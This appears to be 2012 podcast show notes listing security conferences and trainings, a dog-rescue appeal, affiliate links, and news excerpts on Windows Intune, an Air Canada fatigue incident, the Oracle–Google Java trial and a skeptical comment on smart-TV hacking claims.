<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Announcements</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA<br class="kix-line-break" /><br />
	</span><a href="http://www.outerz0ne.org/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD<br class="kix-line-break" /><br />
	</span><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:16px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please Help these two sibling dogs stay alive</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You won&#39;t even believe this story or this absolutely beautiful dog relationship. Just check out the photos below. My heart is breaking. A pit bull and chihuahua -both just 6 years old &#8211; have given their entire lives to taking care of their human owners. Now the owners have had a second baby last week &#8211; and they want both of their dogs to be KILLED IMMEDIATELY because they &quot;don&#39;t have time for them anymore&quot;. They want nothing to do with their poor animals, and have given a person in our group, Sloane, just a few more days to find a foster or permanent home for them. They plan to have the dogs euthanized this weekend. Sloane has been trying to find a foster home for both of them, to keep them together. But the owners said that they don&#39;t care if the dogs are split up &#8211; they just want them gone from their house or dead. Please, if there was ever a time when maybe you could help foster a dog, THIS IS THE TIME!! The chihuahua is so teeny tiny that he is barely an extra inconvenience at all. And these dogs are so bonded, that they will take care of each other and keep each other company. The pit bull is named Dozer and the chiuahahua is named Biggie. They are being kicked out of the only home they have ever known. This experience will be so traumatic for them, especially if they are split up. If any of you have ever volunteered or worked at a shelter, or were around when people were dropping off their dogs to the shelter, you know how horrifying it is to watch a dog be ripped from the life they knew, and thrown into a cage, in a room full of other crying and screaming animals. Great with KIDS and CATS!! Both dogs are apparently great around kids and the owner said that her nieces and nephews hang all over the dogs all of the time, and the dogs are wonderful with them. No aggression AT ALL. Owners used to have 3 cats several years ago, and dogs got along perfectly fine with the cats at that time. They are also good when they see other dogs on the street, but haven&#39;t been given many opportunities to play or socialize. They would of course need to be tested with other dogs/cats, if you have a dog or cat. But it sounds like it is likely there would not be an issue.</span></p>
<p><span style="font-size: 16px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; vertical-align: baseline; ">CONTACT IMMEDIATELY: Sloane 917-648-9808 </span><a href="mailto:bslnews2011@gmail.com"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; vertical-align: baseline; ">bslnews2011@gmail.com</span></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.24653702625073493" style="color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-size: medium; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Please consider making your &nbsp;Amazon purchases through our affiliate link. &nbsp;If you&rsquo;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.24653702625073493" style="color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-size: medium; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">or simply use our QR Code Links.</span></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.24653702625073493" style="color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-size: medium; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Amazon:<br />
	</span><img height="135px;" src="https://lh5.googleusercontent.com/VzdfnFwQhOeZ1TliObA6vDsndR1d6P0qIzkbkSTQdWwXIXMp7k3K0mEUKaVakUv7A2t7NmDKS00aBGqDm_nvYhnGfIDutrTKIsinEOQRTVKIShpp0Do" width="135px;" /></b></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><b id="internal-source-marker_0.24653702625073493" style="color: rgb(0, 0, 0); font-family: 'Times New Roman'; font-size: medium; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Amazon UK:<br />
	</span><img height="138px;" src="https://lh5.googleusercontent.com/1d9hr1nEey5Oz7suDRYMH0z2LuBxFwhWvulrYBpjBDRk_Y-5_eL3xzlEEABXmf_uVkytUg5ER8GjpUbcwDCD_0d0Gq96xKmXQOSy5Nh1Nv5DIUv6TN8" width="138px;" /></b></p>
<p>&nbsp;</p>
<p><span style="background-color: transparent; color: rgb(0, 0, 0); font-family: Arial; font-size: 16px; "><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://searchconsumerization.techtarget.com/news/2240148725/Windows-Intune-goes-mobile-with-iOS-Android-management?asrc=EM_NLN_17080078"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://searchconsumerization.techtarget.com/news/2240148725/Windows-Intune-goes-mobile-with-iOS-Android-management?asrc=EM_NLN_17080078</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft has finally acknowledged that it&rsquo;s in its best interests to offer a way to manage Apple and Android devices alongside Windows.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The next version of Windows Intune, Microsoft&rsquo;s cloud-based desktop management tool, will also manage employee-owned iPads, iPhones and Android devices, in addition to Windows phones and tablets.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&rsquo;s a significant move for Microsoft &#8212; especially now, as the company pushes its new generation of Windows phones and tablets.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Some IT administrators have been waiting for a multiplatform mobile management tool from Microsoft and are pleased that the company has finally developed a bring your own device (BYOD) support strategy.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft announced the next version of Windows Intune on Wednesday at the Microsoft Management Summit (MMS) in Las Vegas, and a pre-release version is now available for download.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Intune will provide MDM capabilities through Active Directory (AD) and Exchange ActiveSync. It will also help IT and end users deploy applications to mobile devices. In addition, employee-owned devices that aren&rsquo;t connected to the corporate AD can be deemed &ldquo;domain trusted,&rdquo; which will still allow them to access corporate data and apps.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;It&rsquo;s not just about enabling your users on Windows anymore,&rdquo; said Brad Anderson, Microsoft&rsquo;s corporate vice president for management and security, during the MMS keynote. &ldquo;We are doing deep, deep integration with iOS and Android.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The next version of Intune will let IT create links to apps within their devices&rsquo; respective app stores, and Anderson said it will also allow for the side-loading of apps &#8212; that is, the installation of apps directly from Intune, without going through each device&rsquo;s app store. Apple does not allow side-loading on iOS; in response to a question about how iOS side-loading will work through Intune, a Microsoft spokesperson cited this passage from the</span><a href="http://windowsteamblog.com/windows/b/business/archive/2012/04/18/what-s-next-with-windows-intune.aspx"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Windows for Your Business</span></a><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> blog:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.reuters.com/article/2012/04/16/us-aircanada-incident-idUSBRE83F10120120416"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.reuters.com/article/2012/04/16/us-aircanada-incident-idUSBRE83F10120120416</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A sleepy Air Canada pilot first mistook the planet Venus for an aircraft, and then sent his airliner diving toward the Atlantic to prevent an imaginary collision with another plane, an official report said on Monday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sixteen passengers and crew were hurt in the January 2011 incident, when the first officer rammed the control stick forward to avoid a U.S. plane he wrongly thought was heading straight toward him.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Under the effects of significant sleep inertia (when performance and situational awareness are degraded immediately after waking up), the first officer perceived the oncoming aircraft as being on a collision course and began a descent to avoid it,&quot; Canada&#39;s Transportation Safety Board said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;This occurrence underscores the challenge of managing fatigue on the flight deck,&quot; said chief investigator Jon Lee.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The incident occurred at night on board a Boeing 767 twin engine passenger plane flying from Toronto to Zurich in Switzerland with 95 passengers and eight crew.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The report said the first officer had just woken up, disoriented, from a long nap, when he learned from the pilot that a U.S. cargo plane was flying toward them.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The FO (First Officer) initially mistook the planet Venus for an aircraft but the captain advised again that the target was at the 12 o&#39;clock position (straight ahead) and 1,000 feet below,&quot; said the report.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;When the FO saw the oncoming aircraft, the FO interpreted its position as being above and descending towards them. The FO reacted to the perceived imminent collision by pushing forward on the control column,&quot; the report continued.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The airliner dropped about 400 feet before the captain pulled back on the control column. Fourteen passengers and two crew were hurt, and seven needed hospital treatment. None were wearing seat belts, even though the seat-belt sign was on.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://news.cnet.com/8301-1035_3-57415324-94/oracle-ceo-larry-ellison-i-dont-know-if-java-is-free/"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-1035_3-57415324-94/oracle-ceo-larry-ellison-i-dont-know-if-java-is-free/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Among the highlights emanating from U.S. District Court in San Francisco courtroom 8 today was Oracle CEO Larry Ellison&#39;s response to a question regarding the status of the Java programming language, which his company acquired when it bought Sun Microsystems in 2010.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Asked by Google&#39;s lead attorney, Robert Van Nest, if the Java language is free, Ellison was slow to respond. Judge William Alsup pushed Ellison to answer with a yes or no. As ZDNet reporter Rachel King observed in the courtroom, Ellison resisted and huffed, &quot;I don&#39;t know.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In other words, it&#39;s complicated.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Java is free, but it also has a set of licenses that are required for specific use cases. Google&#39;s defense is that the 15 million lines of code in its Android smartphone software contains only the parts of Java that are freely available and not restricted by licensing or copyright. Google&#39;s strategy, in part, was to fork from the standard Java implementation to ensure that Android provided a differentiated platform for app developers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A license to Java is required when class libraries based on Java API designs are used and when Java software components are download. Oracle disputes Google&#39;s claim that Android doesn&#39;t use any Java code, and it asserts that the company also used documentation and developer tools that would legally require a license from Oracle (see the slideshow below with Oracle&#39;s case against Google).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Google asserts that Android doesn&#39;t use any Java code or documentation not in the public domain, and it says the 37 APIs in Android that Oracle has identified as infringing on its intellectual property are not subject to copyright. Therefore, Google says, it doesn&#39;t need to pay Oracle licensing fees.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.infoworld.com/d/security/spoiler-alert-your-tv-will-be-hacked-191013?page=0,0"><span style="font-size:16px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infoworld.com/d/security/spoiler-alert-your-tv-will-be-hacked-191013?page=0,0</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:16px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[KR: I put this story in because of the way the author has addressed this. He says &ldquo;I got root from directory traversal and XSS!&rdquo; I might be ignorant here, but that a directory traversal vulnerability and a reflected XSS != root shell. They might have found vulnerabilities in the box, and TVs might be truly hackable, but the story reads like FUD to me, honestly.]</span></p>
<p>&nbsp;</p>
